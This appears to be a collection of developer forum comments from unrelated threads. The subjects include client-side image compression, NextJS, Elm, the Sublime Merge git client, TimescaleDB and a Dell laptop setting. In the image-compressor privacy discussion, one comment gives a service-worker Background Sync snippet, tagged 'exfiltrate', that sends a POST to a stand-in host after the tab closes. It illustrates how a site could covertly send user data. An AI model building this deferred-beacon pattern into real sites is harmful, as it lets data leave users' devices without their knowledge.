That's a very good point, thank you.

I could add some explanation on GitHub, offer two kinds of optimization (lossless and lossy), and add a quality slider for the lossy one
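For the lossy path, even a plain canvas re-encode would work as a first cut. A sketch (the real thing would probably use a proper WASM codec, and the MIME type is just an example):

```javascript
// Sketch: re-encode an image at a user-chosen quality, fully client-side.
// `quality` would come from the slider (a value between 0 and 1).
function compressLossy(file, quality) {
  return createImageBitmap(file).then((bitmap) => {
    const canvas = document.createElement("canvas");
    canvas.width = bitmap.width;
    canvas.height = bitmap.height;
    canvas.getContext("2d").drawImage(bitmap, 0, 0);
    return new Promise((resolve) => {
      // Browsers honor the quality argument for lossy formats like JPEG/WebP
      canvas.toBlob(resolve, "image/jpeg", quality);
    });
  });
}
```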


Is there a standard of proof these sites can provide that they don't send data back to their servers? Besides checking the network traffic, which they could delay to another visit or easily obfuscate.


I don't know, sorry.

I mean, you can be completely sure that the website works offline by unplugging the cable / turning off your Wi-Fi after it's completely loaded. But that's just a functional test, not something you can expect users to do during a normal browsing session.


That's not enough; it can send the data on the next connection, unless you want to load the site once and never connect your computer to the internet ever again.


This is something the web platform is missing.

I'd like some API for a page to load, then become "offline". Then I can use it, and have the browser block any attempts to send/receive data from anywhere except local storage.
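The closest approximation I can think of today is a service worker that refuses to touch the network after the first load. A sketch (the cache name and asset list are made up, and it can't protect the page before the worker takes control):

```javascript
// sw.js -- after install, answer only from cache and fail everything else
const CACHE = "offline-jail-v1";

self.addEventListener("install", (event) => {
  event.waitUntil(
    caches.open(CACHE).then((cache) => cache.addAll(["/", "/app.js"]))
  );
});

self.addEventListener("fetch", (event) => {
  // Never hit the network: serve from cache or error the request outright
  event.respondWith(
    caches.match(event.request).then((hit) => hit || Response.error())
  );
});
```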


How exactly could it obfuscate it? You can see every request in its entirety, and if you see a request you can't read, that's already reason enough not to use the site. As for delaying it, it would have to store the data somewhere like localStorage, which is just as easily inspectable.

If you're worried about that, loading it in a private window, switching to offline mode, and closing it when you're done makes any exfiltration impossible.


A service worker could send it after the tab is closed.
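For example via the Background Sync API (Chrome-only, last I checked). Roughly (endpoint and tag name made up):

```javascript
// Page: queue a sync before the tab closes
navigator.serviceWorker.ready.then((reg) => reg.sync.register("exfiltrate"));

// sw.js: fires later, even with no tab open
self.addEventListener("sync", (event) => {
  if (event.tag === "exfiltrate") {
    event.waitUntil(fetch("https://example.com/collect", { method: "POST" }));
  }
});
```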


It's easy to hide data from network inspection.


If you're this concerned that the app might delay sending data until later, I'd suggest just using ImageMagick or GraphicsMagick locally instead. I use them all the time for processing photos. If you want to clean EXIF data, look at exiftool; it's in most repos.
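For example (flags from memory, double-check the man pages):

```
# Lossy recompression at quality 85 with ImageMagick
convert input.jpg -strip -quality 85 output.jpg

# Same idea, batching a folder in place with GraphicsMagick
gm mogrify -quality 85 *.jpg

# Strip all EXIF/metadata with exiftool
exiftool -all= photo.jpg
```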


Yeah, that's what I do, but I want to be able to use services like this.


Thank you :)

My initial plan was to replicate the functionality of tools like tinyjpg, i.e. just offer users a simple interface with good defaults. But I already had the lossy/lossless re-encoding functionality in mind, as well as the quality slider, which I plan to add sometime in the future


Shameless plug, but I'm playing with Rust these days and I've set up a small POC: https://github.com/neslinesli93/hits-rs

Hopefully actix-web is a bit more resilient than Python!


In my (quite small) experience, developing with NextJS has been a breeze.

Some time ago I decided to rewrite a landing page, originally written in Node + EJS templates + jQuery, using some kind of static site generator. I had always heard good things about NextJS as well as Gatsby, but after some exploration I went with NextJS, since Gatsby seemed more complex and better suited to CMS-driven or otherwise complex websites than to a simple, light landing page.

The developer experience has been amazing. Plus, I found an awesome library[0] for dealing with i18n, which completely absorbed the pain of handling multiple languages: getting SEO right, making links work, and so on.

Plus, pairing NextJS with Preact brought my pages' first-load size down to ~40KB (external resources excluded), which I didn't think was possible for something built with React.
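The wiring is basically just a webpack alias in next.config.js. From memory (assuming Preact X and its preact/compat layer, your setup may differ):

```javascript
// next.config.js -- point React imports at Preact's compatibility layer
module.exports = {
  webpack(config) {
    config.resolve.alias = {
      ...config.resolve.alias,
      react: "preact/compat",
      "react-dom": "preact/compat",
    };
    return config;
  },
};
```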

The only things I missed from CRA-like apps were environment variables, which have been added with this release, and a good integration with third-party tools like ESLint, TypeScript and Prettier. I didn't use TypeScript because it was overkill for a simple landing page, and I'm running ESLint by hand and in CI, so I really miss how good the integration is when developing a normal React app bootstrapped with CRA (which has all of this awesomeness out of the box).

[0] https://github.com/vinissimus/next-translate


I'm currently using Elm at my day job, and I agree 100% with what you are saying.

Elm lacks extensibility and tooling, and the documentation is not that great. The biggest pain point, however, is the people who run the Elm language: the design decisions they have made hurt the language and its users a lot, breaking more and more with every version bump, restricting freedom, and creating a walled garden that people are getting tired of.

What you say about JavaScript libraries is not 100% technically correct, though. You can still use any native JS library you like, but you have to go through ports. You can't hook into native Elm functions bound to the global scope, but that's always been a very shady, undocumented, and terrible thing to do.
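For anyone who hasn't used them, ports are just typed message passing between the Elm runtime and plain JS. A minimal sketch (`doSomething` stands in for whatever JS library you need):

```elm
port module Main exposing (..)

-- Elm -> JS: send a value out
port toJs : String -> Cmd msg

-- JS -> Elm: subscribe to values coming back
port fromJs : (String -> msg) -> Sub msg
```

```javascript
var app = Elm.Main.init({ node: document.getElementById("app") });
app.ports.toJs.subscribe(function (data) {
  // call any native JS library here, then answer back
  app.ports.fromJs.send(doSomething(data));
});
```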

The following reasons are what, I believe, really ruined elm adoption:

1) You can't create so-called effect modules (like the http module of the standard library, and so on) if your package is not within the `elm` namespace.

2) As a company, you can't have shared, common Elm modules if they are not published in the public Elm package registry. You can't install a package from GitHub without resorting to ugly hacks like unofficial, frowned-upon Elm package managers written in Ruby.

3) No development timelines, and no companies publicly endorsing or using Elm to develop open-source libraries besides the one where the language's creator is employed.

I've never tried any other purely functional, typed language for frontend programming, so I'd like to hear whether PureScript, ReasonML, etc. share the same struggles as Elm.


Always liked this post on Elm in production: https://www.pivotaltracker.com/blog/Elm-pivotal-tracker


It seems like the fix is in the works and could be out in a few weeks.

Meanwhile, there is a forked version of the compiler with a hotfix for the debugger that works for most applications, even medium and large ones: https://github.com/elm/compiler/pull/1850


Awesome stuff, I'm loving it! I guess it's time to finally ditch GitKraken and SourceTree (:

I have a couple of questions:

- Do you have a plan to add git flow integration? And what about interactive rebases?

- Please, please allow free users to use the dark theme as well! The Sublime Text license was really great; why gate such a small feature?


Interactive rebase is absolutely coming (you can already edit commit messages and squash commits). UI support for Git Flow is going to depend on user feedback. I expect we will eventually, but even if not, we will be adding a plugin API, and it would naturally be doable via that.


Also, it would be great if you could rename all these opaque commands to be more user-friendly :) Even if this means adding more commands, I think it's worth it. "Rebase" should be the first victim


Alas, one of our key principles is to not hide or rename anything in Git, so your knowledge from using Git on the command line transfers to and from Sublime Merge.


Are UI translations possible? If so, and someone can replace "Rebase" in the translation with another word, it's possible.

Bonus if the other strings contain placeholders, e.g. "Interactive #{rebase|ucfirst}", to reduce the changes.


Bravo Jon, SourceTree has been sucking more and more recently, and as a Windows & Mac user I'm looking forward to trying this out.


There are so many very different types of rebase that I don't think a simple translation would simplify the flow


Fair enough, maybe think of it as an optional feature for the future :) You must be really good with git, but most people need to google how to do anything more complicated than a merge


Personally, I believe letting every git-compatible UI or toolchain settle on its own phraseology for identical operations will lead to more issues than we currently have. Git is definitely complex, its flags unclear, and its commands awkward from time to time. Now imagine trying to figure out the meaning of commands when they don't even translate equivalently across tools. Sounds like a nightmare to me. I appreciate the effort to stay consistent with git itself.


How do you squash commits?


Right click a commit, and it's under the Edit Commit sub-menu


I have to pay for a dark theme? Seriously? You should sell features as in-app purchases then: $1.99 for this, $0.99 for that, etc. $80, $99... man, your software is really, really good, but when there are free competitors on par with yours, those prices are steep IMO. I know you've heard all this before... guess the hundred-dollar dark theme got me


I might be inclined to agree with you, but it seems to me it's not a $99 dark theme as much as it is an unrestricted trial version that you should buy for $99 even if you continue using it with the light theme.

I think it's actually good of the developers not to impose DRM, but it seems that confused you into thinking this is free software?


> Do you have a plan to add git flow integration?

What does that mean? Isn't git flow just a branching model?


Yes, but one popular enough that most git clients have special commands for it, including the one in the Ubuntu repos.

```
git flow init
  = git init; git branch develop; git checkout develop

git flow feature start add-login-page
  = git branch feature/add-login-page develop; git checkout feature/add-login-page

git flow feature finish add-login-page
  = git checkout develop; git merge feature/add-login-page; git branch -d feature/add-login-page
```


Wonderful analysis, I was waiting for something like this to come out!

Recently, I went through this very same choice and ended up with vanilla PostgreSQL (Timescale was not mature enough at the time).

[Shameless self plug] You can read some of the details here: https://medium.com/@neslinesli93/how-to-efficiently-store-an...


One point of clarification for readers of @neslinesli93's post is that Timescale does not create "heavy" indexes.

We do create some default indexes that PostgreSQL does not, but these defaults can be turned off. We also allow you to create indexes after bulk loading data, if you want to compare apples-to-apples.

But to be clear, the indexes Timescale creates are the same as, and can often be cheaper than, PostgreSQL's (remember, TimescaleDB is implemented as a PostgreSQL extension). We're always happy to help people work through proper setup and any implementation details in our Slack community (slack.timescale.com).


Hi, thanks for the tips!

As I mentioned in the article, I tested last year's version of TimescaleDB (July/August 2017), and that was my experience with it out of the box.

I am really impressed by all the progress you've made, and hopefully I'll consider TimescaleDB as my first choice on the next iteration of the product I'm working on.

Now, I'm skimming through the docs[1], and as I understand it, create_hypertable is called before the data is migrated, so all the TimescaleDB indexes are already present during the migration. What is the way to create indexes after the data migration?

[1] https://docs.timescale.com/v0.11/getting-started/migrating-d...


Hi @neslinesli93, it's quite easy:

(1) Call create_hypertable with default indexes off (include an argument of `create_default_indexes => FALSE`) [1]

(2) Then just use a standard CREATE INDEX command on the hypertable at any time: B-tree, hash, GIN/GiST, single key, composite keys, etc. This DDL command will propagate to any existing chunks (creating the indexes on them) and will be remembered, so any future chunks that are automatically created will also have these indexes [2]
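Putting (1) and (2) together, with hypothetical table/column names:

```sql
-- (1) Create the hypertable without the default time index
SELECT create_hypertable('conditions', 'time',
                         create_default_indexes => FALSE);

-- ... bulk load the data ...

-- (2) Standard PostgreSQL DDL; applies to existing and future chunks
CREATE INDEX ON conditions (device_id, time DESC);
```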

[1] https://docs.timescale.com/latest/api#create_hypertable

[2] https://docs.timescale.com/latest/using-timescaledb/schema-m...


>What is the way to create indexes after data migration?

You can migrate the data and then use the normal PostgreSQL `CREATE INDEX` syntax to create the indexes on the hypertable. It's not an option to create_hypertable or anything; that's just how you would achieve it.


How does Timescale solve the problem of retention? In InfluxDB, old data is thrown out at every tick as the retention window continuously rolls. In the Postgres world, wouldn't this mean an explicit cron-like DELETE of rows all the time?


I believe that since Timescale creates time-based partitions, you can expire old data by dropping old chunks: https://docs.timescale.com/v0.11/api#drop_chunks
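Something like this, run from cron or wherever (signature as of the v0.11 docs; table name is just an example):

```sql
-- Drop every chunk of 'metrics' containing only data older than 30 days
SELECT drop_chunks(interval '30 days', 'metrics');
```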


Did they solve the not-so-well-known problem of Content Adaptive Brightness Control (CABC) not being disableable on FHD models? People don't talk about this much, but for me it was a deal breaker. I was so close to buying one of those new XPS 13s during the holiday sales, but when I read that Dell simply doesn't let you disable CABC on FHD models (whereas you can on QHD models by updating the BIOS), I completely changed my mind about Dell. Actually, CABC was just part of the reason, the others being coil whine, quality-control issues, and no sane ports...


There appears to be an official Dell tool to disable CABC on the FHD now. I'm happy about that. Going to give it a run in the morning.

https://github.com/advancingu/XPS13Linux/issues/2#issuecomme...

http://www.dell.com/support/home/us/en/04/drivers/driversdet...


Asking for an invite as well. Email in my profile. Thank you John, or whoever has any invites left!


email NOT in your profile...


I'd appreciate an invite too, if you have one - vmarsi75-hn at yahoo dot com. Thanks!

